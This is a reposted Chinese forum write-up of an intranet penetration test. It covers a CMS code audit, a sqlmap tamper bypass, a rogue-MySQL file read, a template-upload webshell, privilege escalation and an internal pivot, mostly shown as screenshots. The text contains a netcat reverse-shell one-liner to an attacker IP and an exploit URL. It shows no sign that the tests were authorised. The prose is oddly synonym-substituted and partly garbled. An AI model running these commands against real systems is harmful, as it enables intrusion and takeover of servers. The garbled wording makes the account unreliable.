fny5jt9 发表于 2024-10-3 18:28:12

记一次代码审计的Linux内网渗透

<strong style="color: blue;">记一次代码审计的Linux内网渗透</strong><img src="https://mmbiz.qpic.cn/mmbiz_gif/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyUA9iaL2dfjic05DiaMxchvqXWtJf7ib5sro4cfXZibmVEdacS4L5sJciaUrg/640?wx_fmt=gif&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyI2TSENf74UyBB7oamtksZhaedgdV4NiaIys0EHXA7RAMsnQtdmIhFgg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>1<span style="color: black;">DMZWEB SERVER</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><strong style="color: blue;">InfomationGathering</strong></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyA3g2eU61kqMTnmuBFg0m3SticicKBaKX2y7MX4jQKwZvkMKE8OZXfqhg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">看到<span style="color: black;">重点</span>是开了</span><span style="color: black;">888</span><span style="color: black;">、</span><span style="color: black;">21</span><span style="color: black;">、</span><span style="color: black;">80</span><span style="color: black;">、</span><span style="color: black;">3306</span><span style="color: black;">端口,</span><span style="color: black;">888</span><span style="color: black;"><span style="color: black;">好似</span>是</span><span style="color: black;">bt</span><span style="color: black;">,看一下</span><span style="color: black;">80:</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyI2TSENf74UyBB7oamtksZhaedgdV4NiaIys0EHXA7RAMsnQtdmIhFgg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;"><span style="color: black;">便是</span><span style="color: black;">咱们</span>的<span style="color: black;">目的</span>站,某</span><span style="color: black;">cmsv1.0</span><span style="color: black;">,下载下来审计一波<span style="color: black;">瞧瞧</span>。</span></span></p>2<span style="color: black;">PHPCMS Code Audit</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">分析流程<span style="color: black;">发掘</span></span><span style="color: black;">index.php-&gt;./loader/load.php-&gt;./loader/doc.php</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">先看</span><span style="color: black;">load.php</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyQjniam2XrcFibrYOFGYic9EDTB2pSGLulvIIEpW8fUtvxSOSnerY8sqBA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">注释<span style="color: black;">亦</span>比较清楚,<span style="color: black;">便是</span><span style="color: black;">按照</span></span><span style="color: black;">url</span><span style="color: black;">加载功能的引导页,再看</span><span style="color: black;">doc.php</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyXgWAORRRj7wc4dV9ibhnM7mwtibEuW4VXkT1B7f1jq0W1Bmzn9MXnmDQ/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;"><span style="color: black;">首要</span><span style="color: black;">包括</span>了比较重要的</span><span style="color: black;">/inc/fuction.php</span><span style="color: black;">,<span style="color: black;">而后</span>对传入的参数做了</span><span style="color: black;">cleanArrayForMysql()</span><span style="color: black;">处理。往下看,比较重要的路由规则</span><span style="color: black;">:</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttykH9YMgMQibQRtr8A8DdEsHG7evbfk0icfPYAcMicSHTiawyI9Q6UzWEicYw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyxXVTIkO5ZSTeFrnKCA556VeabzOsdRtgpHfyfQzcDiaKPVb9mVXmsPQ/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyTTGXqCEhhwQaySBDmdb4Mn1OfeRhfw6OZkT8txZxrW7JnFM4MEIyOQ/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">路由大概<span style="color: black;">便是</span><span style="color: black;">这般</span>的,比较简单,<span style="color: black;">然则</span>最后一部分调用</span><span style="color: black;">action</span><span style="color: black;">之前有一个</span><span style="color: black;">HTML_LOAD()</span><span style="color: black;">:</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyTPRzxIbexeT7ciazCKP4kWSNyMibR5f5fC9OnrTnsr6jtL34acA69KCg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">经过测试应该是进入了最后一个</span><span style="color: black;">else</span><span style="color: black;"><span style="color: black;">而后</span><span style="color: black;">转</span>,应该是开启了伪静态的<span style="color: black;">原由</span>。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">接下来看一下常用函数有<span style="color: black;">无</span>问题</span><span style="color: black;">:/inc/function.php</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyedhmztAIN3zUZLcFuTKjghn5u28L27RbBO2VvicBuibKAZzAXTvbctuA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty53p3QFhzS365bOJ7ZYaXzXBP6VGWibLm3jRj83LMXcQrhnrtwtKXt9A/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;"><span style="color: black;">能够</span>看到对基本</span><span style="color: black;">sql</span><span style="color: black;">注入的关键字进行了检测。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;"><strong style="color: blue;">后台</strong></span><span style="color: black;"><strong style="color: blue;">getshell:</strong></span><span style="color: black;">/admini/controllers/system/changeskin.php</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttymVyaXZXOT4nZ4aXM1QyLZa2HG8koJ2mQB5Dogww1udDcttK2l5ibT0w/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">上传模板,</span><span style="color: black;">zip</span><span style="color: black;">文件直接解压。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;"><strong style="color: blue;">SQL</strong></span><span style="color: black;"><strong style="color: blue;">注入</strong></span><span style="color: black;"><strong style="color: blue;">:</strong>content\search\index.php</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyW8ZbN322xCss2HpBoOGibYicuNtTFVMkXvJmib2jTEtRUbVIiaFm9GibADg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">search</span><span style="color: black;">功能,在进行</span><span style="color: black;">urldecode()</span><span style="color: black;">之前就进行了</span><span style="color: black;">checkSqlStr()</span><span style="color: black;">检测处理,<span style="color: black;">因此呢</span>达不到效果。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty1q8ib2hy1LqJfj0JWmIAicGSfbYBLz0nOo7X5rP7cZgJCg6h7wnuTDEQ/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">写个</span><span style="color: black;">tamper</span><span style="color: black;">脚本,进行两次</span><span style="color: black;">url</span><span style="color: black;">编码就行,用</span><span style="color: black;">sqlmap</span><span style="color: black;">跑</span><span style="color: black;">:</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyCBP4aVMzH1oYJ87Y9yNnFGsNBxIOm8eHxW6kEZO3rsKNsRXEBXkdGw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyBVVmjr4TMlsdfxM5HLocCsNUoyf6hPUA0t6icY0vH6CueI8feQFXHlA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">跑出来以后不<span style="color: black;">晓得</span>这什么加密,看一下</span><span style="color: black;">:/admin/login.php</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttylqD4bHjwf8iabdcHqsJ76TxTvb9ekuNp95yxQiaDVohLpmg1Yvb4icYvw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">跟进</span><span style="color: black;">docEncryption:</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyIAXc88kOZO1dcbCI1PScskTz07xCvaZ9JpUNCtYl1ibLdrY2wcvWq7Q/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">看了下,</span><span style="color: black;">getjxqy3()</span><span style="color: black;">中后面三行问题都不大,但<span style="color: black;">第1</span>部分字符串截取是不可逆的。尝试能<span style="color: black;">不可</span>用</span><span style="color: black;">sql-shell</span><span style="color: black;">去修改一下<span style="color: black;">秘码</span>。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyoOWLXQZjoBkS9LjSibep5NibPHXBbJ5m7HF1kpbthEG5pgzcI1n9tcXw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">后面<span style="color: black;">发掘</span>数据库<span style="color: black;">能够</span>外连,尝试能<span style="color: black;">不可</span>搞到数据库账号<span style="color: black;">秘码</span>。</span></p>3<span style="color: black;">MySQLArbitrarily File Read</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">/setup/chkdb.php</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyzuvK3UAytnhTqBXsYMBHfQK6uCnKoH7OTadBA3D21F937Aib4qAEdRg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">先让它报错获取路径。</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyU3sOia2g9uR3lzcyM2vCMbiaRprEH8dskiaxYKbEh0cO6SHXDDKHBibnSA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">而后</span>本地数据库开启外连来读文件。</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty2JWsw7JIeiawkicibPI6qyza00sVzOQaIb0UET4nnh8wvJichwIgrRhUBw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">读取文件的<span style="color: black;">同期</span><span style="color: black;">发掘</span><span style="color: black;">亦</span>爆路径了,不<span style="color: black;">晓得</span>是不是这个伪造的</span><span style="color: black;">mysqlserver</span><span style="color: black;">的<span style="color: black;">原由</span>,以后没办法爆路径<span style="color: black;">能够</span>试一下</span><span style="color: black;">(</span><span style="color: black;">伪造</span><span style="color: black;">mysqlserver</span><span style="color: black;">默认账号<span style="color: black;">秘码</span><span style="color: black;">便是</span></span><span style="color: black;">root123456)</span><span style="color: black;">。</span></span></p><span style="color: black;">http:<span style="color: black;">//www.xxx.com/setup/checkdb.php?dbname=mysql&amp;uname=root&amp;pwd=123456&amp;dbhost=xxx.xxx.xxx.xxx&amp;action=chkdb</span></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyZOkALSz9yJ0pDgFBLSsXTct6KXeiahZyMickibTbFWhRnyGcCFw7RrBrg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyXYviaGaITt1JR38yxbwncqiagv966P17zuxQRGvaR6r5e3Kiccice9np5g/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">更新一波<span style="color: black;">秘码</span>直接上后台。</span></p>4<span style="color: black;">Bypass disable_functions</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">用刚才找到的上传模板</span><span style="color: black;">getshell</span><span style="color: black;">,本地有环境,直接把</span><span style="color: black;">shell</span><span style="color: black;">放进去<span style="color: black;">本来</span>的模板打包上传。<span style="color: black;">发掘</span>上传失败。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">遂修改模板加上一句话<span style="color: black;">亦</span>不行,<span style="color: black;">全部</span>模板目录<span style="color: black;">拜访</span><span style="color: black;">发掘</span></span><span style="color: black;">403</span><span style="color: black;">,<span style="color: black;">不外</span><span style="color: black;">不碍事</span>,不需要直接<span style="color: black;">拜访</span>,<span style="color: black;">由于</span>本来用的模板<span style="color: black;">便是</span>它,<span style="color: black;">能够</span>自动加载。<span style="color: black;">能够</span>执行代码,<span style="color: black;">然则</span></span><span style="color: black;">AntSword</span><span style="color: black;">连不上。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyyU2FA9gjqAII6aBlX7Nzm5Fc89y1RzZ20oeMd1zc05kFIrk6R1CuGw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">菜刀成功连接,写入</span><span style="color: black;">shell</span><span style="color: black;">用</span><span style="color: black;">AntSword</span><span style="color: black;">连接<span style="color: black;">就可</span>。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty6Kl2QfCf9DTDXwp9yklvHNr2OU32WIJuZeapwOmwaVPu0KEOicUdf5g/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">估计有</span><span style="color: black;">disablefunctions</span><span style="color: black;">。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty9yZGwB3QdYCxECvoSyr2lF3GzluQmaWf0XoibMtBpEYSCWwCaep0lTQ/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>5<span style="color: black;">privilegeEscalation</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyCicWMdhAt2MGHUAo6f9GVZGw4XgOYvZ8VTKMdVviamicJYAT8AKN0HCuw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">看了下</span><span style="color: black;">sudo</span><span style="color: black;">版本,试一下。<span style="color: black;">然则</span><span style="color: black;">针对</span></span><span style="color: black;">linux</span><span style="color: black;">提权还是<span style="color: black;">创立</span>一个交互式</span><span style="color: black;">shell</span><span style="color: black;">比较方便。</span></span></p><span style="color: black;">rm/tmp/f;mkfifo /tmp/f;cat /tmp/f|<span style="color: black;">/bin/</span>sh -i <span style="color: black;">2</span>&gt;&amp;<span style="color: black;">1</span>|nc192<span style="color: black;">.168</span><span style="color: black;">.8</span><span style="color: black;">.187</span> <span style="color: black;">1456</span> &gt;<span style="color: black;">/tmp/</span>f python3 -c <span style="color: black;">import pty;pty.spawn("/bin/sh")</span></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">1</span><span style="color: black;">、</span><span style="color: black;">SUID</span><span style="color: black;">提权</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyRTs2PIeFfdeic6MWAaPWdKZdhamicC9k3Ajdve2Ovl1SEkaydDq9LxtA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">好家伙,直接一波</span><span style="color: black;">root</span><span style="color: black;">。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyo095wFL9fl1ia3yFVISicEibwOQbiaWdt2bTNicjr5WKmTgibP5blEKErX7A/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">2</span><span style="color: black;">、</span><span style="color: black;">bt</span><span style="color: black;">提权</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyB2SfBN6J84rgUPNdzFuibZf4icdeS5fDM98z7D26nK5nVbJZGBpicV7jw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">用户桌面<span style="color: black;">发掘</span>的</span><span style="color: black;">bt</span><span style="color: black;"><span style="color: black;">关联</span>信息。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttysg9yonDZL85scTicDHc6MiaF7lgruOe6G9RwUnqhmYo5rxPn6ymibic89w/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">加上计划任务。</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttygLPje4VyiaBhgqRwpLdZVwDZ1zqIRzXtfdMDMbrKuhaF4EJZN80IYIA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty7Lx0QqrjHzzKsqDmRibdy9cKcV2WapQia1EqIHvEzcc9BfSlN6iabKgoA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><strong style="color: blue;">Intranet</strong></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyeNj1MjNQ6nXLX9gLNomxsBaiaQwlWAhaib4WBzEroSk1buPPicy4EcwqA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">两张网卡。</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyJCHTazo1MrhbtT923GYMicYzuicfP1QD3xwory5GjQmMVJxq0MqicC90w/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">开个代理用</span><span style="color: black;">nmap</span><span style="color: black;">探测一下内网<span style="color: black;">发掘</span></span><span style="color: black;">144</span><span style="color: black;">是</span><span style="color: black;">up</span><span style="color: black;">的,再看下端口。</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyn064cYrRhNwhR6DAiaD1IePxoAicdZ1Bibg1vveMdj6QMXfBJjo1rfYrw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>6<span style="color: black;">emlog getshell</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyD4dM1HTbJrJVsGL5X5cn6MTicClgDib9eY7DOqdF8WibQOwUHonpADOFQ/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
